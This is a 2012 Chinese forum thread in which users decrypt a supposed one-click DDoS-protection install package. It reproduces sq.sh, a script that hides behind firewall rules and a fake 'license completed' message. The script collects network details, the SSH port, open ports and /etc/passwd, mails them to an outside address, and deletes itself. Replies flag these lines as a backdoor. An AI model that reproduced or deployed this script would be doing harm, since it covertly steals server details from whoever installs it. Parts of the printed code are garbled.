这里是维基解密。

zllovesuki · 发表于 2012-6-2 07:24:01

上次你们说那个什么DDoS一键包，我解密了，大家可以参考一下

ddosinstall.sh内容：

"

zllovesuki · 发表于 2012-6-2 07:24:52

其中，z.sh的内容：

"

zllovesuki · 发表于 2012-6-2 07:26:07

其中sq.sh内容（这里他做坏事了）：
#!/bin/bash
cat >>/etc/sysctl.confa.txt
ulimit -SHn 65535
/sbin/sysctl -w net.ipv4.ip_forward=1 >a.txt
/etc/init.d/iptables save >a.txt
mv /etc/sysconfig/iptables /etc/sysconfig/iptables.bak
/sbin/service iptables restart >a.txt
/sbin/iptables -F
/sbin/iptables -X
/sbin/iptables -Z
/sbin/iptables -N input_ext
/sbin/iptables -F input_ext
modprobe ipt_ttl
modprobe xt_limit
modprobe xt_tcpudp
modprobe ipt_length
modprobe ipt_pkttype
modprobe ipt_recent
/sbin/iptables -A INPUT -i lo -j ACCEPT
/sbin/iptables -A OUTPUT -o lo -j ACCEPT
/sbin/iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT
/sbin/iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT
ping
/sbin/iptables -I INPUT -p icmp --icmp-type echo-request -m length --length 84 -j DROP
/sbin/iptables -I INPUT -p icmp --icmp-type echo-request -m length --length 87:65535 -j DROP
/sbin/iptables -I input_ext -m pkttype --pkt-type broadcast -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m limit --limit 2/s -j ACCEPT
/sbin/iptables -I INPUT -p tcp --syn -m ttl --ttl-gt 241 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m ttl --ttl-lt 34 -j DROP
/sbin/iptables -I INPUT -p udp -m length --length 3001:65535 -j DROP
/sbin/iptables -I INPUT -p udp -m length --length :40 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m length --length :40 -j DROP
#/sbin/iptables -I INPUT -p tcp --syn -m length --length 60 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m length --length 78 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m length --length 3001:65535 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m ttl --ttl-eq 128 -j DROP
/sbin/iptables -I INPUT -p udp -m udp --dport 161 -j ACCEPT
#/sbin/iptables -I OUTPUT -p udp -j DROP
/sbin/iptables -I OUTPUT -p udp -m udp --sport 161 -j ACCEPT
/sbin/iptables -I INPUT -s 127.0.0.1 -j ACCEPT
/etc/init.d/iptables save >a.txt
/sbin/chkconfig --level 345 iptables on
##crontab -e
cat >>/var/spool/cron/roota.txt
sqnetwork=`/sbin/ifconfig|grep HWaddr|awk '{print $5}'|sed -n '1,1p'`
quanxian=`echo "$sqnetwork"|md5sum|awk '{print $1}'|md5sum|awk '{print $1}'`
touch /etc/sysconfig/console/$quanxian
touch /etc/sysconfig/console/network
cat /dev/null >/var/spool/mail/root
echo "unset MAILCHECK">> /etc/profile
source /etc/profile
/sbin/service sendmail restart >a.txt
echo "wait......."
mailtxt=`ifconfig`
sshprot=`cat /etc/ssh/sshd_config |grep Port`
duankou=`netstat -atln`
yonghu=`cat /etc/passwd`
ip=`ifconfig | sed -n '2,2p'|awk '{print $2}'|awk -F : '{print $2}'`
/usr/lib/sendmail -t
To: swm9988@126.com
Subject: install-IP$ip
---------------------------------
$mailtxt
---------------------------------
$sshprot
---------------------------------
$duankou
_________________________________
$yonghu
---------------------------------
echo "install to..."
sleep 5
/sbin/service sendmail stop >a.txt
echo "The server license has been completed."
rm -rf a.txt
cat >>/etc/rc.local/data/firewall/class.txt
echo "192.168|127.0.0.1">>/data/firewall/class.txt
rm -rf /data/firewall/sq.sh

单手摘月 · 发表于 2012-6-2 07:26:19

s.sh解密了没东西，不知道是不是我的系统问题

i.sh解密内容：

"

d.sh内容：

"

bai.sh无法解密

updata.sh无法解密

zllovesuki · 发表于 2012-6-2 07:28:07

膜拜

dstwhk · 发表于 2012-6-2 07:30:51

很牛.

454309099 · 发表于 2012-6-2 07:39:56

本帖最后由 lazyzhu 于 2012-6-2 07:56 编辑

还有个uninstall.sh,看看有没后门

lazyzhu · 发表于 2012-6-2 07:54:35

黑客啊

shineme · 发表于 2012-6-2 07:57:30

我就说了是假的东西,感谢楼主解密,该加分

亮点在

sshprot=`cat /etc/ssh/sshd_config |grep Port`
duankou=`netstat -atln`
yonghu=`cat /etc/passwd`
ip=`ifconfig | sed -n '2,2p'|awk '{print $2}'|awk -F : '{print $2}'`
/usr/lib/sendmail -t
To: swm9988@126.com这个用C#写的吗?语法太恶心了

dominZuckerberg · 发表于 2012-6-2 08:12:05

Zuckerberg 发表于 2012-6-2 08:15

这个用C#写的吗?语法太恶心了
bash

		自动登录	找回密码
密码			立即注册

这里是维基解密。

本帖子中包含更多资源